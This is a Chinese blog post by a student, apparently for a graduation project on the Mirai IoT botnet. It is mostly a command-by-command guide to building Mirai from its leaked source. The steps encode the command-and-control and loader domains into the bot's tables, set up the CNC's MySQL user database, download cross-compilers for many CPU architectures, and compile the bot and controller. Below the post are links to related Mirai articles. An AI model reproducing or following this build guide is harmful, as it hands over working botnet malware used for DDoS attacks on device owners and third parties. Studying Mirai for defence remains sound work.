恶意代码Mirai的编译

最新推荐文章于 2024-08-10 07:29:06 发布
最新推荐文章于 2024-08-10 07:29:06 发布
阅读量1.6k 收藏 3
点赞数
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/dengwt123/article/details/84867978

        毕业设计的题目是恶意代码Mirai的研究与实验,所有趁着刚学完打算写点文章做做笔记。从运行原理和原帖的安装指导中不难看出,安装主要分为编译,主控安装,接收器加载器安装等几部分。

1、 源码下载地址:https://github.com/jgamblin/Mirai-Source-Code

下载命令: git clone https://github.com/jgamblin/Mirai-Source-Code

2、 环境要求:

. 操作系统: linux

. gcc

. golang

. electric-fence

. mysql-server

. mysql-client

3、 环境安装:

. 安装gcc编译器:sudo apt-get install gcc  (苹果电脑使用brew install gcc)

.安装编译环境:sudo apt-get install build-essential

. 安装go语言: sudo apt-get install golang (苹果电脑使用brew install golang)

. 安装内存调试工具electric-fence: sudo apt-get install electric-fence (苹果电脑使用brew  install electric-fence )

. 安装数据库: sudo apt-get install mysql-server mysql-client(安装时需要设置数据库密码请记住)

4、 编译加密模块和配置CNC

cd Mirai-Source-Code-master

cd mirai/tools && gcc enc.c -o enc.out

./enc.out string Master_domain

将返回一段字符串(\x....)

./enc.out string Loader_domain (Master_domain表示主控服务器域名,Loader_domain表示Loader服务器域名)

将返回一段字符串(\x....)

修改/mirai/bot下tables.c文件,将执行上述两条命令返回的字符串分别替换add_entry(TABLE_CNC_DOMAIN 和 TABLE_SCAN_CB_DOMAIN)两项中类似的字符串

修改/scripts目录下db.sql文件,在CREATE DATABASE mirai后的空行添加 use mirai 字段

5、 启动MySQL服务

service mysql start

cat db.sql|mysql -uroot -proot (p后为数据库密码)

mysql -uroot -proot mirai

INSERT INTO users VALUES (NULL, 'mirai-user','mirai-pass', 0, 0, 0, 0, -1, 1, 30, '');

exit

修改/mirai/cnc下main.go中database相关字段,与设置的数据库匹配

6、 配置交叉编译环境

命令行切换到scripts文件夹下

cd .. && mkdir cross-compile-bin

cd cross-compile-bin

wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv4l.tar.bz2 

wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv5l.tar.bz2 

wget http://distro.ibiblio.org/slitaz/sources/packages/c/cross-compiler-armv6l.tar.bz2

wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i586.tar.bz2 

wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i686.tar.bz2 

wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-m68k.tar.bz2 

wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mips.tar.bz2 

wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mipsel.tar.bz2 

wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-powerpc.tar.bz2 

wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sh4.tar.bz2 

wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sparc.tar.bz2 

wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-x86_64.tar.bz2 


7798479-6fa4aad12ba00bfb.jpg

cd ../scripts

sudo ./cross-compile.sh

编译过程会提示是否安装mysql,选否就可以

修改.bashrc,把刚才交叉编译的bin 目录加进去方便使用

export PATH=$PATH:/etc/xcompile/armv4l/bin

export PATH=$PATH:/etc/xcompile/armv5l/bin

export PATH=$PATH:/etc/xcompile/armv6l/bin/

export PATH=$PATH:/etc/xcompile/i586/bin

export PATH=$PATH:/etc/xcompile/m68k/bin

export PATH=$PATH:/etc/xcompile/mips/bin

export PATH=$PATH:/etc/xcompile/mipsel/bin

export PATH=$PATH:/etc/xcompile/powerpc/bin

export PATH=$PATH:/etc/xcompile/powerpc-440fp/bin

export PATH=$PATH:/etc/xcompile/sh4/bin

export PATH=$PATH:/etc/xcompile/sparc/bin

export GOPATH=$HOME/go

修改完成后执行 mkdir ~/go和source ~/.bashrc


7798479-efee6bd60ce10aec.jpg

7、 编译CNC 和BOT

go get github.com/go-sql-driver/mysql

go get github.com/mattn/go-shellwords

修改/mirai目录下build.sh文件,删除与armv61相关的语句

命令行切到/mirai下执行 ./build.sh debug telnet

cd ../loader

./build.sh

8、测试

telnet 127.0.0.1 输入账号密码,测试成功,此外debug文件夹下面会有我们编译好的文件。


7798479-0e954c74fdde5de5.jpg
Mirai源码编译
陈京九的个人博客
04-04 1462
首先声明:本教程只用于技术交流,请勿用于非法用途。请严格遵循相关法律法规 2016年10月21日,美国东海岸地区遭受大面积网络瘫痪,其原因为美国域名解析服务提供商Dyn公司当天受到强力的DDoS攻击所致。Dyn公司称此次DDoS攻击涉及千万级别的IP地址(攻击中UDP/DNS攻击源IP几乎皆为伪造IP,因此此数量不代表僵尸数量),其中部分重要的攻击来...
物联网病毒原理-Mirai源码分析
热门推荐
安全杂货铺
01-09 1万+
1.概述 Mirai病毒是物联网病毒的鼻祖,由于其具备了所有僵尸网络病毒的基本功能(爆破、C&C连接、DDoS攻击),后来的许多物联网病毒都是基于Mirai源码进行更改的。所以对研究Mirai的源码可以让我们对物联网病毒有个全面的了解。 项目地址:https://github.com/jgamblin/Mirai-Source-Code 2.攻击流程 1.黑客在黑客服务器上运行load...
G.O.A.T!最靠谱的Mirai僵尸病毒编译教程
weixin_42652850的博客
03-16 4763
前言 最近在学习Mirai病毒环境的搭建,看了网络上几乎所有的关于Mirai病毒编译的教程,学到了很多,最后也成功把环境搭建起来。我渐渐地发现,对于这个病毒的编译,每个教程都有一点小小的瑕疵,所以单看一个教程是很难成功搭建的。但也正是这些人的分享,我才可以对Mirai病毒有了一定的了解。同时我也想对某些步骤进行一些原理上的解释,于是就有了这篇博客,是一篇堪称保姆级的搭建教程。 “万物之源” 这个病...
深度解析:恶意软件“Mirai”源代码的结构及其对策
weixin_34280237的博客
07-11 3776
2016年9月份以来,发生了多起大规模DDoS攻击事件。本文针对这些攻击事件中使用的恶意软件“Mirai”的源代码进行分析,进一步介绍Bot(客户端)的结构,以及其应对方法。 一、 Mirai Botnet是什么 2016年9月13日晚,美国著名安全记者Brian Krebs氏的网站“Krebs on Security”被DDoS攻击,mirai Bot...
Mirai恶意软件幕后者落网
mozhe_的博客
10-31 927
Mirai恶意软件的开发者被判处6个月的软禁,并被要求支付860万美元作为对新泽西州罗格斯大学系统发起分布式拒绝服务(DDoS)攻击的赔偿。 22岁的Paras Jha周五在新泽西一家法院被判有罪,此前他承认违反了《计算机欺诈与滥用法案》(CFAA)。除了家庭监禁和支付赔偿之外,Jha的刑期还包括2500小时的社区服务和5年的社会监督。 当局指控他在2014年11月至2016年9月期间对罗格斯...
源码学习:Mirai源码
围城
05-24 1458
2020/04/20 - (文章写的比较乱,主要就是记录一下自己的学习过程) 今天看了两个论文,一个是发表在顶会的对论文的分析,主要是从病毒的传播上来进行分析,简单分析了一些流量的特征;另一个是硕士的毕业论文,对源码进行了稍微全面的分析。 文章[1]是对这个病毒的源码分析,但是他图中就写的不对,他是说loader对服务器进行爆破,实际上应该是病毒进行爆破,而loader承担的是收到已经爆破达到的用...
mirai的github上的源码
11-10
mirai最近比较火,知己知彼方能更好的防护自己的网络,这里是mirai的源码,仅供参考和学习
Mirai 源码分析
北观止的博客
06-25 2563
最近的德国断网事件让Mirai恶意程序再次跃入公众的视线,相对而言,目前的IoT领域对于恶意程序还是一片蓝海,因此吸引了越来越多的人开始涉足这趟征程。而作为安全研究者,我们有必要对此提高重视,本文将从另一角度,即以Mirai泄露的源码为例来小窥其冰山一角。
Mirai 源代码项目教程
gitblog_00286的博客
08-10 365
Mirai 源代码项目教程 1. 项目的目录结构及介绍 Mirai 源代码项目的目录结构如下: Mirai-Source-Code/ ├── cnc/ │ ├── main.c │ ├── ... ├── loader/ │ ├── main.c │ ├── ... ├── tools/ │ ├── ... ├── README.md └── LICENSE 目录介绍 cn...
mirai源代码c语言,Mirai 源码分析
weixin_33451125的博客
05-22 1137
Author: xd0ol1 (知道创宇404实验室)1. 背景概述最近的德国断网事件让Mirai恶意程序再次跃入公众的视线,相对而言,目前的IoT领域对于恶意程序还是一片蓝海,因此吸引了越来越多的人开始涉足这趟征程。而作为安全研究者,我们有必要对此提高重视,本文将从另一角度,即以Mirai泄露的源码为例来小窥其冰山一角。2. 源码分析选此次分析的Mirai源码(https://githu...
mirai源代码c语言,Mirai源码解析
weixin_33092503的博客
05-22 1164
Mirai概述mirai2016年一个备受关注的DDoS攻击程序,与传统的僵尸网络不同的是,mirai的控制的僵尸主要是摄像头等嵌入式设备,mirai的出现将一大波安全研究者引入了IoT安全领域。mirai的事迹主要有:2016.9.20 ,攻击Brian Krebs个人网站,攻击流量达到665Gbps,据称有150万僵尸发起攻击。2016.9.21, 攻击法国网络服务商OVH,攻击流量达到1T...
Mirai变种Masuta源码
03-11
“Masuta”是2018年1月份被研究人员发现的一款新型Mirai恶意软件变体,其开发人员Mirai Okiru还曾创建过肆虐全球的Satori僵尸网络。不过,Masuta的代码更加彰显了“专业开发”的属性,无论是其附加功能,还是程序员处理代码痕迹的方式都是前几个版本的变种所不具备的。Masuta的发展不仅展现了漏洞利用家族的演变,还展现了个人程序员的演变。
mirai-api-http:Mirai HTTP API(控制台)插件
04-14
Mirai 是一个在全平台下运行,提供 QQ Android 和 TIM PC 协议支持的高效率机器人框架 这个项目的名字来源于 作品的 以为代表的创作与活动 图标以及形象由画师绘制 mirai-api-http Mirai HTTP API (console) plugin Mirai-API-http插件 提供HTTP API供所有语言使用mirai 安装mirai-api-http 使用 安装mirai-api-http MCL 支持自动更新插件,支持设置插件更新频道等功能 .\mcl --update-package net.mamoe:mirai-api-http --channel stable --type plugin 手动安装mirai-api-http 运行 Mirai Console 生成plugins文件夹 从 Releases 下载jar并将其放入plugins
Botnet:Kali下Mirai编译使用及抓包
无名J0kзr的博客
04-03 4131
文章目录杂主要参考1. 编译1.1 安装依赖1.2 克隆源码1.3 编译加密程序1.4 加密主控服务器域名和报告服务器域名1.4 修改病毒本体源码1.5 配置CNC控制中心1.5.1 编辑sql脚本1.5.2 创建用户mirai1.5.3 修改主程序1.6 交叉编译1.7 添加环境变量1.8 构建受控端和主控端程序1.9 构建Loader 杂 是为了做NIDS啦,网上都找不到Mirai公开的数据集...
Mirai环境搭建
围城
08-05 3533
20200805 - 引言 关于Mirai的环境搭建,我记得能搜到很多结果。不过我当时并没有想要启动mirai的所有功能。毕竟其实他的代码也有缺陷,现在想扫出来结果也有点难了。后面可能还是需要这些功能来辅助扫描结果,其他功能还是要开启。这里先记录一个别人的搭建步骤,后面再来记录我自己的。 [1]他人环境搭建 在这个环境的部署过程中,需要下载很多东西,包括各种乱七八糟的东西,还有交叉编译的环境,为了获得CNC的服务器,还要有go的启动环境。我个人觉得,还是弄一个docker的环境更好。 参考文章 [1] Mi
工作日志 2011-02-15
congge5629的博客
02-15 113
今天从uClibc的主页上下载了一个交叉工具链包cross-compiler-armv4l.tar.bz2,一个包含busybox的瘦根文件系统压缩包mini-native-armv4l.tar.bz2,一个胖根文件系统压缩包s...
海泰ukey内核支持及使用
funtasty的专栏
12-09 4402
Linux内核模块   Redhat 7.2的内核为2.4.9,对Usb接口支持不足,不建议使用Redhat 7.3   以前的版本,有用户在Redhat 7.2下使用KeyDisk出错,KeyDisk是将key   和U盘通过Usb Hub连接在一起的,需要内核支持Usb Hub等特性,升级内   核后才解决。   Redhat 7.3内核在G31等新主板上兼容性不好,需要将Usb 2
蠕虫木马Mirai
m0_49025459的博客
02-07 2673
概述概述Mirai病毒是物联网病毒的鼻祖,能够感染在 ARC 处理器上运行的智能设备,将其转变为远程控制的机器人或“僵尸”并组成网络。这种机器人网络称为僵尸网络,通常用于发动 DDoS 攻击。由于Mirai病毒具备了所有僵尸网络病毒的基本功能(爆破、C&C连接、DDoS攻击),后来的许多物联网病毒都是基于Mirai源码进行更改的。攻击流程Mirai 扫描互联网上运行于 ARC 处理器上的 IoT 设备。这种处理器运行 Linux 操作系统的精简版本。
永磁同步电机全速域无传感器控制技术及其应用 加权切换法
最新发布
07-29
内容概要:本文详细探讨了永磁同步电机(PMSM)在全速域范围内的无传感器控制技术。针对不同的速度区间,提出了三种主要的控制方法:零低速域采用高频脉振方波注入法,通过注入高频方波信号并处理产生的交互信号来估算转子位置;中高速域则使用改进的滑膜观测器,结合连续的sigmoid函数和PLL锁相环,实现对转子位置的精确估计;而在转速切换区域,则采用了加权切换法,动态调整不同控制方法的权重,确保平滑过渡。这些方法共同实现了电机在全速域内的高效、稳定运行,减少了对传感器的依赖,降低了系统复杂度和成本。 适合人群:从事电机控制系统设计、研发的技术人员,尤其是关注永磁同步电机无传感器控制领域的研究人员和技术爱好者。 使用场景及目标:适用于需要优化电机控制系统,减少硬件成本和提升系统可靠性的应用场景。目标是在不依赖额外传感器的情况下,实现电机在各种速度条件下的精准控制。 其他说明:文中引用了多篇相关文献,为每种控制方法提供了理论依据和实验验证的支持。
搭建与源码解析:探索Mirai僵尸网络的DDoS攻击技术
- 包括编译Mirai的步骤,可能涉及到下载源代码、配置环境变量、编译安装和设置CNC与bot之间的通信。 通过对这些内容的学习,读者可以深入了解Mirai僵尸网络的工作原理,以及如何防范此类攻击,这对于网络安全从业...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值